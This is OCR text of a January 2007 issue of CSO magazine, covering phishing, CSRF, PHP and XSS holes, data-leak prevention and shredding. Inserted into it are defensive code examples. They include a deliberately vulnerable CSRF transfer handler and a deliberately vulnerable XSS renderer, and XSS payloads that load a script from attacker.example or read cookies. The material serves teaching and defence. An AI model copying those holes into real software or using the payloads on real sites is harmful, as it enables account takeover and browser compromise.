Hewlett-Packard  Scandal  Changes  Everything  (Not!) 


Page  26 


VIRTUALLY  SECURE? 

The  pros  and  cons  of 
virtualization 

Page  14 

GRID,  LOCKED 

Power  companies  face 
new  cyber  standards 

Page  32 


Is  responsible  disclosure  dead? 

How  the  Web’s  unruly  technical  and  legal 
landscape  imperils  security  research. 


BY  SCOTT  BERINATO 


PAGE  18 


January  2007  $9.00  www.csoonline.com 


THE CHILLING EFFECT


ARBOR 

NETWORKS 

Copyright © 2006 Arbor Networks, Inc. All rights reserved. Arbor Networks, the Arbor Networks logo, Peakflow, and ArbOS are registered trademarks of Arbor Networks, Inc., and Security to the Core. Performance to the Edge. is a trademark of Arbor Networks, Inc. All other trademarks are the property of their respective owners.


Security  to  the  Core.  Performance  to  the  Edge. 


To learn more, watch the Webcast "Securing the Enterprise with Network Behavior Analysis" at www.arbornetworks.com/cso-nba


Get  award-winning  protection  for  your  network. 

The  accelerating  change  of  network  technology  has  created  more  complex  security  threats, 
such  as  attacks  from  the  network's  vulnerable  perimeter.  Developed  by  Arbor  Networks,  Arbor 
Peakflow®  X  is  an  award-winning  solution  that  lets  you  implement  advanced  network  behavior 
analysis  (NBA)  capabilities  across  your  network  while  supporting  compliance  with  security 
policies  and  regulations.  Gain  network-wide  visibility  and  anomaly  detection  with  NBA  -  only 
from  Arbor  Networks. 


“The threat of being harassed is already a disincentive. Essentially now my research is restricted.”

PURDUE  UNIVERSITY 
PROFESSOR  DR.  PASCAL 
MEUNIER,  PAGE  18 


January 


Vol.  6,  No.  1 


COLUMNS 

14 Virtually Secure
Virtual machines have a lot to offer CISOs and security researchers alike. And, unfortunately, hackers too.

By  Simson  Garfinkel 

36  Eyes  on  the  World 

CSO UNDERCOVER The need to standardize our surveillance systems seemed obvious—until we had to sell the idea globally.


DEPARTMENTS 


Briefing 

The  bad  guys  get  smarter;  Benchmarks  for 
confidential  hotlines;  The  Security  Blotter; 
Watch  out  for  PHP  holes;  Strange  tales  from 
theft  reports;  Research  aims  to  detect  online 
terrorist  activity;  When  to  shred  documents 

Debriefing

Fearless  Predictions  for  2007 




IN  EVERY  ISSUE 


18  The  Chilling  Effect 

cover  story  SOFTWARE  SECURITY  How  the  Web  makes  creating 
software  vulnerabilities  easier,  disclosing  them  more  difficult  and 
discovering  them  possibly  illegal.  By  Scott  Berinato 

26 5 Things About Corporate Investigations That Won’t Change

CSO Fundamentals

Inside Out


Every month we get at least one press release citing the latest security survey as evidence that the insider threat is greater than the outsider threat. This is a cue for you, dear CSO, to spend less on your perimeter and more on whatever “insider threat prevention” tool the press release is trumpeting. Amusingly, we also frequently get press releases claiming the opposite, mentioning the ever-growing crescendo of targeted hacks and zero-day exploits.

Insider versus outsider? To me it’s a moot argument, and press releases about which is more dangerous make my eyes glaze over. Any security plan worth its salt needs controls to defend against both.

The security plan was actually part of the problem at Hewlett-Packard, as noted in Sarah D. Scalet’s examination of HP’s investigation fiasco (“5 Things About Corporate Investigations That Won’t Change,” Page 26). However, while the goof-ups perpetrated in the overzealous investigation rightfully drew much of the attention, at the root of all of the mess you had a very well-placed insider divulging confidential information.

When you’re trying to keep your employees on the straight and narrow, obviously you need good internal controls. Segregation of duties, solid auditing procedures, that Sarbanes-Oxley stuff. There’s also a whole class of relatively new software products that aim to help prevent company employees from misappropriating confidential data or proprietary plans. Their insider versus outsider press releases may be boring, but I find the products fascinating. In various ways, they all monitor employees’ computer activities pertaining to corporate data. If Larry in the call center tries to burn a CD with a bunch of customer credit card numbers, the software can block Larry, warn him, alert the security department or all of the above. Vendors in this space include Verdasys, Vontu, Vericept, Oakley Networks, PortAuthority and Reconnex. Then there are other folks focused narrowly on outbound messaging, such as Orchestria. One challenge is that the vendors use differing terminology to describe what they do: content filtering, intellectual property protection, data leakage (or even “extrusion”) prevention. Also, they all have different points of emphasis (messaging leaks, data at rest, USB copying) and different methods (some sit on the network, others put a client on each computer), so choosing the right one requires comparison shopping. The vendor field in fact seems a bit overcrowded, so some consolidation wouldn’t shock me. But the premise of this product class makes sense to me, particularly for big-company CSOs with highly sensitive intellectual property and/or lots of regulatory oversight.

Of course, the HP boardroom leak was mostly via cell phone, not e-mail. Sometimes technology only gets you so much. -Derek Slater, dslater@cxo.com
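The "block Larry, warn him, alert the security department" decision described in the column rests on content inspection: the agent has to recognize card numbers in whatever is about to leave the machine. The following is an added example of that check, not code from CSO or from any of the vendors named; the warn/block thresholds and the CSV export are constructed for illustration.

```python
"""Added example: content inspection of the kind a data-leakage-prevention
agent runs before allowing a copy to removable media or an outbound message.
Not vendor code; the policy thresholds below are assumptions."""
import re
from dataclasses import dataclass

# Candidate 13- to 19-digit runs, allowing a space or dash between groups.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check; rejects most random digit runs (ticket IDs etc.)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list[str]:
    """Return the digits-only form of every candidate that passes Luhn."""
    found = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


@dataclass
class Verdict:
    action: str          # "allow", "warn" or "block"
    alert_security: bool
    count: int


def evaluate_transfer(payload: str, warn_at: int = 1, block_at: int = 5) -> Verdict:
    """Assumed policy: one card number warns the user; five or more blocks the
    transfer and alerts the security department."""
    n = len(find_card_numbers(payload))
    if n >= block_at:
        return Verdict("block", True, n)
    if n >= warn_at:
        return Verdict("warn", False, n)
    return Verdict("allow", False, n)


# Constructed sample: the sort of export "Larry" might try to burn to CD.
# The card numbers are the public test numbers of the major brands.
SAMPLE_EXPORT = "\n".join([
    "name,card,expiry",
    "A. Customer,4111 1111 1111 1111,01/09",
    "B. Customer,5500-0000-0000-0004,03/08",
    "C. Customer,340000000000009,11/08",
    "D. Customer,6011000000000004,07/09",
    "E. Customer,3530111333300000,12/08",
    "ticket,1234567890123456,n/a",   # 16 digits but fails Luhn: not a card
])

if __name__ == "__main__":
    print(evaluate_transfer(SAMPLE_EXPORT))
```

The Luhn filter is what keeps a check like this from firing on every order number or serial; the regex alone would flag the ticket line too. A real product adds context (which application, which destination, which user) to the same decision.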


HOW TO REACH US E-mail csoletters@cxo.com Phone 508 872-0080 Fax 508 879-7784 Address CSO Magazine, 492 Old Connecticut Path, P.O. Box 9208, Framingham, MA 01701-9208; Subscriber Services Phone 866 354-1125 Fax 847 564-9453 E-mail cso@omeda.com; Reprints For article reprints (100 quantity or more), contact Jennifer Eclipse at PARS International at 212 221-9595 x237 or e-mail jeclipse@parsintl.com.


Secure Access,


© 2006 Authenex, Inc. All rights reserved. Authenex, A-Key, ASAS, ACert, My A-Key and associated logos are registered or unregistered trademarks of Authenex, Inc. All other registered or unregistered trademarks are the property of their respective owners.


The Authenex Strong Authentication System (ASAS) is the most advanced, cost-effective network security system with two-factor authentication for LAN, remote VPN and web access. Consisting of the ASAS Server and a chip-based token called the A-Key®, ASAS provides PKI Challenge-Response or One-Time Password authentication to your users, wherever they are. Because the A-Key token is secure, even if it is lost or stolen, it is unusable to anyone but its owner and administrator.


FOR  MORE  INFORMATION 

www.authenex.com or call 1.877.AUTHENEX


3-way  Protection;  One  Token 

One-Time  Password,  PKI  (Certificates)  or  Challenge-Response  Authentication 
-  all  available  on  the  same  key. 


Quick  and  Easy  Installation 

The  ASAS  solution  is  fully  compatible  with  existing  IT  infrastructure,  VPN  and 
Firewall,  via  RADIUS  and  TCP/IP.  Installation  usually  takes  less  than  30 
minutes. 


Mobile  Identity 

The available My A-Key™ feature stores user profiles which can be utilized with applications, such as Single Sign-On. For PKI applications, the ACert™ function stores digital certificates and signatures on the A-Key token.


Cost  Effective  Solution 

An  all-in-one  solution  utilizing  Authenex  proprietary  technology  makes  the  ASAS 
solution  very  affordable  and  ensures  a  quick  return  on  investment. 


The Business Case for Security

How to Plan, Deliver, Measure and Communicate

Join us at The Broadmoor, Colorado Springs, CO, March 18-20, 2007 and learn from the best in the business about the process of building the business case for security.

Don’t miss the Pre-Conference Critical Incident Table Top Exercise on Sunday, March 18th

Program Highlights:

CSO Perspectives offers security executives unparalleled access to many of the world’s leading experts in security and risk management.

Opening Keynote: L. Paul Bremer, Ambassador, Author of My Year in Iraq: The Struggle to Build a Future of Hope

Additional speakers include:
Elizabeth King, Vice President, Info Management Services, Starbucks Coffee Company
Audrey Pantas, Chief Information Security Officer, Xerox Corporation
Bob Bragdon, Publisher, CSO magazine

Closing Keynote: How Do You Know When It’s Working? William Wipprecht, Executive Vice President and CSO, Wells Fargo & Company

Platinum Sponsor: Cisco

For more information and to register visit www.csoonline.com/csop_2007 or call 800-366-0246


MALWARE  Attackers  have  raised  their  game  markedly  in  the 
past  three  months,  delivering  salvos  harder  to  resist  (and  detect). 
Recent  developments: 

■  Advanced  phishing  In  the  parry  and  thrust  of  phishing 
defenses  and  phishing  attacks,  one  particular  e-mail,  sent  to  bank 
employees,  represented  a  bold  move  for  the  bad  guys  in  its  level 
of  social  engineering  sophistication:  It  pretended  to  be  from  a 
journalist  researching  a  news  story  about  a  data  leak  at  that  bank, 
and  addressed  the  recipient  by  first  name. 

“Dear _ ,"  the  e-mail  started.  “I  am  a  reporter  for  Finance  News 

doing  a  follow-up  story  on  the  recent  leak  of  customer  records  from 
[the  bank’s  name],  I  saw  your  name  come  up  in  the  article  from 
Central  News  and  would  like  to  interview  you  for  a  follow-up  piece.” 

The e-mail then provided what appeared to be a link to the "Central News" story—a URL that included the bank’s name in its characters. The message ended, "If you have time I would appreciate an opportunity to further discuss the details of the above article. Regards, Gordon Reily.”

At one bank, hundreds of employees received the e-mail. The CSO at that bank (he would speak only on the condition of anonymity) eventually determined that clicking on the link connected to a website in China and installed a keylogger on the machine that accessed the link. Such a targeted attack would seek to have a bank employee with data access unwittingly log passwords and account information, which the malware would deliver to the attacker.

The e-mail was sophisticated; its grammar was impeccable, and it addressed recipients by name (which suggests the attacker had access to the bank’s e-mail rolls and could avoid blasting the e-mail and getting caught in spam filters). The guise of a journalist following a story was reasonable. And the e-mail suggested that the recipient was cited in a previous story, which would pique the person’s interest.

■ IM as distribution network Chris Boyd, director of malware research at FaceTime Communications, came across a botnet in development that enabled an attacker to insert a link into an IM conversation that, when clicked, installed a bot on that computer. It appeared that the compromised computer then would become part of a spam distribution botnet. But after analyzing the "ridiculously complex and bizarre" code, Boyd believes that the attackers were still developing the botnet’s capabilities to go far beyond that.

Mastering the use of IM as a malware distribution engine concerns Boyd and others, because once attackers can insert their links, it’s hard to stop them. For example, even if the IM network blocks certain IP addresses and link hosts from getting on its network, "it takes five minutes to change the link," Boyd says. That’s a lot of time for an IM network that has more than 80 million users.

■ The specter of CSRF Cross-site request forgery, or CSRF, is when an attacker embeds a request to another site, say, an online banking transaction URL, in a page he controls. If a user visited the bank site but didn’t log out and then went to the site the hacker controls, she would still be logged in to the banking session; her browser would attach the bank’s session cookie to the forged request, so the bank would treat the URL the hacker injected as a legitimate step in her banking session. A test example of CSRF was used to add movies to people’s Netflix queues without their knowledge. -Scott Berinato

eBay Phishing

Indiana University researchers conducted an experiment—after getting approval that it was ethical—in which they targeted eBay users with a phishing attack. The researchers, Markus Jakobsson and Jacob Ratkiewicz, thought of this as “spear phishing” because of its targeted nature, rather than the typical spamlike attempts to fool end users. The researchers had a success rate of up to 14 percent per attack per year, compared with previous estimates that phishing yields a 3 percent success rate.

“We think spear phishing attacks will become more prevalent as phishers are more able to harvest publicly available information to personalize each attack,” Ratkiewicz said.
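The journalist-pretext message above carried a link whose URL merely contained the bank's name. The check below, which a mail gateway or an analyst could run over such a message, is an added example and not part of the original article; the bank name "ExampleBank", its domain, and the message text are constructed.

```python
"""Added example: flag links whose hostname is not under the organisation's
real domain but still carry its brand string (the lookalike pattern in the
phishing message above). Bank name, domains and message are constructed."""
import re
from urllib.parse import urlsplit

# Assumed: the bank's own registrable domain(s). Anything else that merely
# contains the brand string is treated as a lookalike.
LEGIT_DOMAINS = {"examplebank.com"}
BRAND = "examplebank"

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname. Adequate for .com-style TLDs; a real
    deployment uses the public suffix list so that .co.uk etc. work."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_url(url: str) -> str:
    """'legit' (under a real domain), 'lookalike' (brand string anywhere in
    the URL but not in the registrable domain) or 'other'."""
    host = urlsplit(url).hostname or ""   # strips user@ tricks and ports
    if registrable_domain(host) in LEGIT_DOMAINS:
        return "legit"
    if BRAND in url.lower():
        return "lookalike"
    return "other"


def suspicious_links(message: str) -> list[tuple[str, str]]:
    """Every link in the message that is not under a legitimate domain."""
    return [(u, classify_url(u)) for u in URL_RE.findall(message)
            if classify_url(u) != "legit"]


# Constructed message modelled on the pretext described in the article.
MESSAGE = """Dear Alice,
I am a reporter for Finance News doing a follow-up story on the recent leak
of customer records from ExampleBank. I saw your name come up in the article
from Central News: http://centralnews-examplebank.example.net/story/leak.html
Your bank's own statement is at http://www.examplebank.com/press
Regards, Gordon Reily
"""

if __name__ == "__main__":
    for url, verdict in suspicious_links(MESSAGE):
        print(verdict, url)
```

Deciding on the hostname rather than on the raw URL string is the point: "examplebank.com" can appear in the path, in a subdomain of an attacker's domain, or before an @ in the userinfo part, and only the registrable domain says where the request actually goes.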
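The CSRF scenario described above, reduced to its essentials: a transfer handler that trusts the session cookie alone, beside one that also demands a per-session token the attacker's page cannot read. This is an added example, not code from CSO, from any bank or from Netflix; the session store, handler signatures and request shape are assumptions standing in for a real web framework.

```python
"""Added example: cross-site request forgery in miniature, with the
vulnerable handler beside a synchronizer-token hardened one. The session
store and request model are assumptions, not any real framework."""
import hmac
import secrets
from dataclasses import dataclass, field

SESSIONS: dict[str, dict] = {}   # cookie value -> session state


def login(user: str) -> str:
    """Create a session; return the cookie the browser will send back."""
    cookie = secrets.token_hex(16)
    SESSIONS[cookie] = {"user": user, "csrf": secrets.token_hex(16), "balance": 1000}
    return cookie


@dataclass
class Request:
    method: str
    params: dict
    cookies: dict = field(default_factory=dict)


def transfer_vulnerable(req: Request) -> str:
    """Authorizes on the session cookie alone. The browser attaches that
    cookie to any request aimed at the bank, including one an attacker's page
    triggers, so the forged request looks exactly like a real one."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    amount = int(req.params["amount"])
    sess["balance"] -= amount
    return f"200 sent {amount} to {req.params['to']}"


def transfer_hardened(req: Request) -> str:
    """Synchronizer token: a state change must be a POST carrying a secret
    bound to the session. The attacker's page cannot read that secret (the
    same-origin policy keeps the bank's responses from it), so it cannot
    build a request that passes."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    if req.method != "POST":
        return "405 state change requires POST"
    token = req.params.get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        return "403 missing or invalid CSRF token"
    amount = int(req.params["amount"])
    sess["balance"] -= amount
    return f"200 sent {amount} to {req.params['to']}"


def simulate(handler) -> tuple[str, str, int]:
    """Victim logs in, uses the bank's own form once, then visits the
    attacker's page. Returns (legit result, forged result, final balance)."""
    sid = login("alice")
    cookies = {"sid": sid}
    # Legitimate transfer from the bank's form, which embeds the token.
    legit = handler(Request("POST", {"to": "bob", "amount": "10",
                                     "csrf_token": SESSIONS[sid]["csrf"]}, cookies))
    # Forged request: the attacker's page contains something like
    # <img src="https://bank/transfer?to=mallory&amount=500">. The browser
    # adds the cookie on its own; the attacker never sees the token.
    forged = handler(Request("GET", {"to": "mallory", "amount": "500"}, cookies))
    return legit, forged, SESSIONS[sid]["balance"]


if __name__ == "__main__":
    print("vulnerable:", simulate(transfer_vulnerable))
    print("hardened:  ", simulate(transfer_hardened))
```

Requiring POST is not by itself a defence (an attacker's page can auto-submit a form); it is the unguessable, session-bound token that the forged request cannot supply. Current browsers add a second layer by defaulting cookies to SameSite=Lax, which withholds the cookie on most cross-site requests, but server-side tokens remain the portable control.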


ILLUSTRATION  BY  DARCY  MUENCHRATH 
in the Light

CONFIDENTIAL HOTLINES A report analyzing more than 180,000 hotline calls collected from 550 organizations found that in the majority of cases—65 percent—the callers reported information that warranted an investigation.

The ensuing investigations resulted in an organization taking corrective action 46 percent of the time, with outcomes that included firing, disciplining or suspending workers who violated company policies. The “2006 Corporate Governance and Compliance Hotline Benchmarking Report" was prepared by The Network, a hotline and employee communications system provider, using anonymized data from its clients between 2002 and 2005. The CSO Executive Council, a professional organization for security executives affiliated with CSO, performed analysis on the data with help from the Association of Certified Fraud Examiners.

The report includes some findings within vertical industries—for example, retail employees are more likely than workers in other sectors to call a hotline. Such findings could be used by CSOs to evaluate their own company's experience, says Bob Hayes, managing director of the CSO Executive Council. Hayes believes this is the first such compilation in the three decades since whistle-blower hotlines were deployed. The researchers plan to produce another report this year incorporating 2006 results.

Other findings from the study:

■ Seventy-one percent of reports to hotlines shared information that was news to management.

■ Callers reporting allegations of corruption and fraud were less likely to remain anonymous than callers reporting other kinds of incidents, such as a concern about health, safety and the environment.

■ Thirty-nine percent of callers learned of the hotline by seeing a sign about it. -Michael Goldberg


Breaches, scams and other recent incidents of note

Democrats take control of Congress.

The Senate confirmed Robert Gates’s nomination to succeed Donald Rumsfeld, who resigned as defense secretary the day after Democrats won enough House and Senate seats to control a majority in both chambers. On Dec. 6, the Iraq Study Group advised President Bush to revamp his Iraq war goals and Middle East diplomatic policies, including opening talks with Iran and Syria.

Oregon lawyer mistakenly linked to Madrid bombings settles suit.

The U.S. government agreed on Nov. 29 to pay Brandon Mayfield $2 million to settle a lawsuit stemming from his wrongful arrest and jailing for two weeks in the aftermath of the Madrid train bombings in 2004. The government also agreed to destroy materials collected during electronic surveillance of Mayfield, The Washington Post reported. Mayfield, who is still pursuing a legal challenge to the USA Patriot Act, alleged he was targeted because he is Muslim.

Vista released to businesses.

Microsoft’s latest desktop operating system, and first since Windows XP in 2001, officially hit the corporate market Nov. 30. It represents a big investment in security, Microsoft says. “Vista is definitely a more secure version of Windows," because it uses encryption and better user access control, says Vincent Weafer, senior director of Symantec Security Response. But within days of its launch, researchers at Sophos asserted Vista was vulnerable to malware; Microsoft disagreed and suggested that such malware relied on social engineering rather than software flaws.


Ease in Sarbanes-Oxley rules urged.

The Committee on Capital Markets Regulation, a bipartisan group of 22 business, legal and academic experts, issued a report Nov. 30 urging the federal government to ease some aspects of Sarbanes-Oxley compliance—for example, adopting more reasonable standards for internal controls and financial statements, and providing more precise guidance on the role of auditors—so that American businesses can cut costs and be more competitive. “The Sarbanes-Oxley Act of 2002 helped restore market confidence after several high-profile scandals. However, the cost of auditing internal controls is unnecessarily high and can be brought down,” says Hal S. Scott, Nomura Professor and director of international financial systems at Harvard Law School and director of the committee.

SHORT TAKES. The Transportation Security Administration said it would charge $28 a year to process background checks on each airline passenger who joins the Registered Traveler program to get through security checks more quickly, Reuters reported.... Kaiser Permanente Colorado confirmed that a laptop containing private data of approximately 38,000 members was stolen from the car of an employee in California, Computerworld reported.... Secure Computer agreed to pay $1 million to settle a Washington state case over its pop-up ads marketing software that purportedly scans users' PCs for spyware.
Watch Out for PHP Holes

In the first half of 2006, desktop filtering software maker Websense counted a 100 percent rise in websites that contained code potentially harmful to visitors. The company declined to reveal how many websites it tallied, but it did say that 40 percent of the sites were hacked—that is, they had their website code altered by outsiders. Of those hacked websites, the vast majority (91 percent) were commissioned to install Trojan horses that take control of visiting computers to turn them into bots—to relay spam, wage denial-of-service attacks or carry out ID theft schemes—or use them as bases for spreading malicious programs such as worms and keyloggers inside the enterprise.

Ben Butler, network abuse manager at GoDaddy.com, a website domain seller and hosting company, says he believes that as many as 50 percent to 60 percent of those successful hacks involve some form of poorly written Web application developed in PHP, a popular and easy-to-use server-side scripting language.

“PHP is an extremely hacked application type because it allows server-side scripts to happen on a website. This script is communicating back to the server, and that pathway can be hacked,” says Butler, who bases his opinion on the hundreds of investigations GoDaddy opens each week into hacked and abusive websites among its hosted domains.

By the end of last year, some 2,100 PHP-related vulnerabilities existed in IBM Internet Security Systems’ database of 30,000 known vulnerabilities. Of all Web development languages, PHP is most widely used because of its ease, says Chris Shiflett, who runs the PHP Security Consortium (at http://phpsec.org) and is the author of Essential PHP Security.

And with ease of use come vulnerabilities, says Bill Boni, corporate vice president of information security and protection at Motorola. Boni says that when you have lots of inexperienced people working with an easy-to-use Web development application, it leads to insecure code.

Boni adds that even experienced developers, under tight deadlines, can create Web applications that are vulnerable to common Web attacks.

Two examples: Last June, Circuit City had one of its webpages turned into a spamware installer. The vulnerability was in a poorly written forms field developed in PHP. And, in October, IBM’s popular WebSphere application server was found to have a cross-site scripting vulnerability, the same type of vulnerability used to propagate a worm on MySpace in October 2005.

-Deb Radcliff
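The "poorly written forms field" and the cross-site scripting bug above are the same class of mistake: a value a visitor submitted is echoed into the page without being encoded for the context it lands in. The following added example shows a vulnerable renderer beside a hardened one. It is illustrative code, not the Circuit City, WebSphere or MySpace code, and it is written in Python rather than PHP since the pattern is the same in any server-side language; the page template and the payloads are constructed.

```python
"""Added example: a form-echo renderer that is open to cross-site scripting,
beside a hardened version that output-encodes per HTML context. Illustrative
only; the template and payloads are constructed."""
import html
from urllib.parse import urlsplit


def render_vulnerable(name: str, homepage: str) -> str:
    """Echoes form fields straight into HTML. Markup in `name` or a
    javascript: URL in `homepage` runs in every visitor's browser."""
    return (f"<p>Thanks, {name}!</p>"
            f'<a href="{homepage}">your site</a>')


def safe_url(url: str) -> str:
    """Allow only http(s) links in a URL attribute; anything else
    (javascript:, data:, vbscript:, relative tricks) becomes a harmless '#'."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def render_hardened(name: str, homepage: str) -> str:
    """Encode for the context each value lands in: text nodes get entity
    encoding, attribute values are quoted and encoded, and URL attributes are
    additionally scheme-checked before encoding."""
    return (f"<p>Thanks, {html.escape(name)}!</p>"
            f'<a href="{html.escape(safe_url(homepage), quote=True)}">your site</a>')


def contains_script(markup: str) -> bool:
    """Crude detector used only to show the difference between the two
    renderers: is there still a <script> tag or a javascript: href?"""
    m = markup.lower()
    return "<script" in m or 'href="javascript:' in m


# Constructed payloads of the kind a worm or spamware installer would submit.
NAME_PAYLOAD = '<script src="http://attacker.example/worm.js"></script>'
URL_PAYLOAD = "javascript:alert(document.cookie)"

if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(NAME_PAYLOAD, URL_PAYLOAD))
    print("hardened:  ", render_hardened(NAME_PAYLOAD, URL_PAYLOAD))
```

Encoding alone does not fix the href: `javascript:` contains nothing that entity encoding changes, which is why URL attributes need a scheme allowlist on top of encoding. In PHP the equivalent calls are htmlspecialchars() with ENT_QUOTES for the encoding step and parse_url() for the scheme check.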


WHAT TO DO

1. Web application filters are a good first step to protecting your Web applications from malicious tampering, but they don't catch everything. Bill Boni strongly recommends ongoing training in coding best practices for all Web developers regardless of the development language they use. “Code reviews, application-level security scanning and rigorous security testing against your Web applications are all essential," he adds.

2. Keep your browsers patched and updated, since the malicious code gets in through vulnerabilities in the browser, Chris Shiflett says. “If you can, get on a less used and less targeted browser, a really solid and mature browser like Opera, Safari or Firefox,” he says.

3. Make sure endpoint security software programs are up to date and centrally managed.


All  That  Glitters  Is  Gone 


INVESTIGATIONS  Some 
items  from  the  annals  of  stolen 
property  we’ve  noticed  recently: 

THE HIGH PRICE OF COPPER, at $3.60 a pound, has police in several cities investigating plundered central-air units and pilfered copper piping. The Wall Street Journal reported in September that the copper components of an air-conditioning unit might fetch $50 to $150 on the scrap market, while the replacement for the home owner costs $2,000 or more. Some criminals have posed as servicemen and removed hundreds of dollars of copper piping at a time.

SCRAP YARDS in Montgomery, Ala., must now report to the police on any copper they purchase.


MORE  THAN  20  ANTIQUE 
WEATHER  VANES,  some  weighing 
hundreds  of  pounds,  have  been 
stolen  off  barn  roofs  in  New 
England  and  New  York  because 
of  their  value.  One  vane  recently 
fetched  $1.2  million  at  auction. 

FOX  NEWS  RECENTLY  picked  up 
a  report  of  “gold  farmers”  who 
play  online  role-playing  games 
like  World  of  Warcraft  in  order 
to  collect  gold  coins  that  they 


can  sell  to  other  players  for  cash. 
The  editor  of  one  game  fan-site 
reported  that  the  mercenaries 
have  become  increasingly  brazen 
and  started  virtually  “mugging” 
other  players  for  gold.  It’s  not 
clear  whether  this  is  illegal  or  just 
bad  sportsmanship. 
Research Aims to Detect Online Terrorist Activity

HOMELAND SECURITY Once the federal government contract details are set, researchers at four universities will begin trolling the Web for early signs of terrorist activity.

Rutgers, the State University of New Jersey; the University of Southern California; the University of Illinois at Urbana-Champaign; and the University of Pittsburgh are working on a $10.2 million project to research methods for detecting online terrorism activity.

In July 2006 the Department of Homeland Security announced the three-year grant to the four universities to advance information analysis and computational technologies.

Fred Roberts, director of the Center for Discrete Mathematics and Theoretical Computer Science at Rutgers, says researchers hope to develop algorithms that will find patterns and relationships in such public sources as news stories and blogs to determine authorship, even when a writer tries to hide his identity. Researchers’ methods will include graph theory, dynamic data analysis, optimization, machine learning and statistical analysis. Each university has its own set of partners; for example, Rutgers’ collaborators include AT&T Labs, Bell Labs and Rensselaer Polytechnic Institute.

Privacy concerns about the research project have been voiced in the blogosphere. ShadowMonkey, a blogger who has a “DHS Watch,” questioned the project after it was announced in July: “If you’re writing on the Net using a pseudonym, are you going to be placed on a watch list?"

Roberts says that “protecting privacy is part of the research agenda.” Safeguards will include anonymizing data, using only publicly available sources and adhering to data handling protocols created by a privacy officer.

Besides privacy, the project will tackle many challenges along the way, such as the vast amount of information with changing sources and how quickly information flows over the Web. In order to evaluate potential terrorist activity, the researchers must develop technologies to rate consistency and reliability of the sources of information. Researchers are currently finalizing contracts with DHS.

-Diann Daniel


When Hewlett-Packard’s overzealous investigation into boardroom leaks hit the news last fall, many people were shocked—shocked!—to hear that the tech giant may have hired third-party investigators to go through individuals' trash. In fact, Dumpster diving is a favorite technique of investigators, and depending on the circumstances—such as local laws and whether trash pickup occurs on public property—it is often legal.

All of which creates the need for employees to shred sensitive documents. Below are a few best practices you can share with colleagues.

Remember that trash is not inherently private. In 1988, the Supreme Court ruled that Americans have no reasonable expectation of privacy in trash they leave out for collection. What’s more, the Economic Espionage Act of 1996, which made it a federal offense to steal trade information, does not protect companies that fail to take reasonable steps to protect their information.

Keep documents only as long as you need to, then follow the instructions for disposal. Especially in regulated industries such as health care and financial services, your company should have policies in place for how long different types of documents should be kept on hand. Be familiar with the retention policies for documents you handle, and make sure you follow the instructions for disposing of them as soon as the retention period is up.

Don’t shred documents out of turn—such as when your company is about to get sued. It will make you look guilty, and the law is not in your favor.

When customer or employee information is headed for the trash, destroy it if it contains information that you would not want made public about yourself. Documents that contain names, Social Security numbers, dates of birth, account balances, health conditions or other personal information should always be shredded.

Shred trash-bound documents that could help the competition. Customer lists, sensitive pricing information, strategic planning documents and trade secrets should never just be tossed in the garbage or recycle bin.

Be especially diligent if you deal with information from consumer reports. The Fair Credit Reporting Act protects credit reports and credit scores as well as reports relating to employment background, check writing history, insurance claims, residential or tenant history, or medical history. Anyone who handles this type of information—from a large mortgage company on down to a family hiring a nanny—must follow strict disposal guidelines that may reasonably include burning, pulverizing or shredding papers so that the information cannot be read or reconstructed.

Speak up if the shredding system in your department is so onerous that people avoid it. Companies have many options for shredding documents, from a $40 cross-cut shredder to outsourced services that will pick up locked bins of sensitive documents, shred them onsite for a fee based on quantity and provide a certificate of destruction.

-Sarah D. Scalet
Virtually Secure?

Virtual machines have a lot to offer CISOs and security researchers alike. And, unfortunately, hackers too.

By Simson Garfinkel

VIRTUALIZATION IS THE hot new trend in corporate data centers today. Virtualization servers from Microsoft, VMware and XenSource allow many virtual computers to run on a single (real) computer system. In practice, this means that 20 or 30 physical servers in a machine room can be turned into the same number of virtual machines running on a single physical system with two, four or eight processors.

Turning 30 computers into one can dramatically reduce the need for power, cooling, cabling and management. And even though the typical virtualization server saps between 5 percent and 10 percent of the physical computer's processing capabilities, virtualization frequently makes an organization's applications run faster, not slower. That's because the physical servers being replaced are quite often underutilized single-CPU hardware that's a few years out of date. By contrast, new multiprocessor systems can give each virtualized machine a boost of CPU power at the precise instant when that CPU power is needed—and give that same boost to other machines when they're the ones who need it most.

But besides being a powerful tool for saving money, virtualization is one of the up-and-coming power tools in the arsenal of today's security practitioners.


Crash, Burn, Repeat

For example, just a few years ago most security consultants had one or more "crash-and-burn" machines for experimenting with potentially hostile programs like spyware, Trojans and computer viruses. These days most of this dissection and examination work has moved to the world of virtual machines. Besides the obvious savings in desk space and power, it's easier to figure out what a piece of spyware has done to a virtual machine than a physical machine, because many of the tools of the virtualization server's host operating system can be used in the analysis.

Using a virtual crash-and-burn machine can also be a lot faster than using a physical machine. One of the positively mind-numbing tasks with my old crash-and-burns was the need to install operating systems onto the hard drives, make "images" of these hard drives, restore the images after the spyware had done something nasty and so on. I had one 9GB drive configured with a copy of Windows 2000, another configured with Linux, and a lot of 9GB drives holding versions of these systems in various states of damage and attack. When I was done experimenting with a new nasty, I would take my reference hard drive and copy it block-for-block back over the work drive. This assured me that I had a nice clean install of the victim operating system ready for another experiment. But I had to boot from CD-ROM and then spend between 20 and 30 minutes to copy the blocks.

